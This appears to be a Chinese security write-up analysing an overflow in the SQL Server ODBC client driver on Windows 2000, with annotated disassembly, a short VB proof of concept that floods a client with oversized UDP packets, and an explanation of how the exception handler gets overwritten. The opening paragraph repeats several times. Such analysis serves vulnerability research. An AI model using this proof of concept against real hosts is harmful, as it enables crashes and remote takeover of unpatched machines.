MS的SQL SERVER ODBC驱动中存在一个溢出漏洞，攻击者可以通过这个漏洞，发送精心组织的数据包就可以达到远程控制任何通过SQL SERVER ODBC列举SQL SERVER服务器的主机。于是看了一下SQL SERVER客户端的两个主要程序的汇编：SQLSVR32。DLL和DBNETLIB。DLL。发现存在一个堆溢出。以下主要是对中文W2K SERVER SP3的自带的ODBC驱动进行的研究，其他平台未测试。英文版的ODBC连接好象不出这个问题。 MS的SQL SERVER ODBC驱动中存在一个溢出漏洞，攻击者可以通过这个漏洞，发送精心组织的数据包就可以达到远程控制任何通过SQL SERVER ODBC列举SQL SERVER服务器的主机。于是看了一下SQL SERVER客户端的两个主要程序的汇编：SQLSVR32。DLL和DBNETLIB。DLL。发现存在一个堆溢出。以下主要是对中文W2K SERVER SP3的自带的ODBC驱动进行的研究，其他平台未测试。英文版的ODBC连接好象不出这个问题。
SQL SERVER ODBC收到包以后会把所有接收到的包转换成unicode格式存放到堆中，而且每个包之间采用";;"作为分界符号。
我们来看一下其处理的汇编代码：
.text:74CB72A1 loc_74CB72A1:
.text:74CB72A1 mov edx, [ebp var_4]
.text:74CB72A4 mov eax, [ebp var_104C]ebp-0x104c放当前已循环的个数
.text:74CB72AA cmp eax, [edx 8] edx 8存放收到的总包个数
.text:74CB72AD jge loc_74CB70F2
.text:74CB72B3 mov ecx, [ebp var_1044]
.text:74CB72B9 mov edx, [ecx 4]
.text:74CB72BC mov eax, [ebp var_1048]
.text:74CB72C2 lea ecx, [eax edx*2]
.text:74CB72C5 mov edx, [ebp arg_8]
.text:74CB72C8 cmp ecx, [edx]
.text:74CB72CA jle short loc_74CB72D3
.text:74CB72CC xor eax, eax
.text:74CB72CE jmp loc_74CB6EB7
.text:74CB72D3 ; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪?
.text:74CB72D3
.text:74CB72D3 loc_74CB72D3: ; CODE XREF: GetNextEnumeration 455j
.text:74CB72D3 mov eax, [ebp var_1044]
.text:74CB72D9 mov ecx, [eax 4]
.text:74CB72DC pushecx ; cchWideChar
.text:74CB72DD mov edx, [ebp arg_4]ebp arg_4是传入的堆开始地址
.text:74CB72E0 add edx, [ebp var_1048] ebp var_1048是计算使用了多少的堆，初始值为0
.text:74CB72E6 pushedx ; lpWideCharStr
.text:74CB72E7 mov eax, [ebp var_1044] ebp var_1044开始是收到包的结构类型数组的指针，这个数组前面4个字节每个包的缓冲地址指针，后面是包的大小，其C的定义如
typedef struct _PACKBUF{
char * bufpoint;
long buflen;}PACKBUF,*PPACKBUF;
PACKBUF sqludprecv[];
ebp var_1044 就是一个 *PPACKBUF=&sqludprecv;
.text:74CB72ED mov ecx, [eax 4] eax存放为包大小数据
.text:74CB72F0 pushecx ; cchMultiByte
.text:74CB72F1 mov edx, [ebp var_1044]
.text:74CB72F7 mov eax, [edx] 载入缓冲地址指针
.text:74CB72F9 add eax, 3从包的便移3开始拷贝，前面三个字节为一个字节包类型，2个字节包长度信息
.text:74CB72FC pusheax ; lpMultiByteStr
.text:74CB72FD push0 ; dwFlags
.text:74CB72FF push0 ; CodePage
.text:74CB7301 callds:MultiByteToWideChar
.text:74CB7307 mov ecx, [ebp var_1044]
.text:74CB730D mov edx, [ecx 4]
.text:74CB7310 mov eax, [ebp var_1048]
.text:74CB7316 lea ecx, [eax edx*2]ecx=包大小乘以2（因为变成双字节了)
.text:74CB7319 mov [ebp var_1048], ecx OK!这个就是结合上面.text:74CB72E0处移动对应堆指针的地方
.text:74CB731F mov edx, [ebp var_104C]
.text:74CB7325 add edx, 1
.text:74CB7328 mov [ebp var_104C], edx 循环数字加1
.text:74CB732E mov eax, [ebp var_1044]
.text:74CB7334 mov ecx, [eax 8]
.text:74CB7337 mov [ebp var_1044], ecx移动到下一个数组的位置: ebp var_1044=ebp var_1044 8;
.text:74CB733D jmp loc_74CB72A1
.text:74CB733D GetNextEnumeration endp

然后在下面的代码产生堆栈溢出：在sqlsvr32.dll中，主要作用是对包数据进行分析的。
.text:411B06A5 mov edx, [esp 10h]
.text:411B06A9 mov ecx, 0FAh
.text:411B06AE xor eax, eax
.text:411B06B0 lea edi, [esp 10h arg_1C]
.text:411B06B4 repe stosd
.text:411B06B6 lea ecx, [edx edx]
.text:411B06B9 mov esi, ebp
.text:411B06BB mov eax, ecx
.text:411B06BD lea edi, [esp 10h arg_1C]
.text:411B06C1 shr ecx, 2
.text:411B06C4 repe movsd
这段代码把原来的堆中的数据到拷贝到堆栈，但是其划分的依据是一个";"作为分界符号，而这个分配的空间是有限的，在01740（6000）给字节的地方会覆盖返回地址。如果你发送几个包，只要在堆中位置连续且不存在";"和0x00,0x00,且大于6000（因为UNICODE处理以后会加倍）则会导致溢出。可以用如下VB代码验证溢出的产生

Dim str As String
Dim str1
Dim i
Winsock1.GetData str
str1 = "" & Chr(5) & Chr(&HFF) & Chr(&H9) ‘最动只能0x1000大小的包
str1 = str1 & str(4092,"2")
For i = 1 To 200
Winsock1.SendData str1
Next
然后你在另一台局域网的某台机器上的管理工具中打开ODBC管理程序，选择一个SQL SERVER的系统DSN，然后在列出下拉SQL SERVER服务器的时候就会引发这个溢出，由于这个传来的代码没有含有特殊的字串，因此程序只会异常退出，其实跟踪一下程序会发现不仅仅引发了异常，而且足够多的数据还可以覆盖异常结构中的异常处理地址，导致最后程序的执行点跳转到0x32003200上（因为传过去溢出字串是'2',asc代码是0x32,而经过MultiByteToWideChar处理以后，被覆盖掉的异常处理程序地址就成了0x32003200了），如果能精心构造传过去的字符内容，就可以达到远程控制主机的目的。
1 2 : 　　MS的SQL SERVER ODBC驱动中存在一个溢出漏洞，攻击者可以通过这个漏洞，发送精心组织的数据包就可以达到远程控制任何通过SQL SERVER ODBC列举SQL SERVER服务器的主机。于是看了一下SQL SERVER客户端的两个主要程序的汇编：SQLSVR32。DLL和DBNETLIB。DLL。发现存在一个堆溢出。以下主要是对中文W2K SERVER SP3的自带的ODBC驱动进行的研究，其他平台未测试。英文版的ODBC连接好象不出这个问题。

上一页12 下一页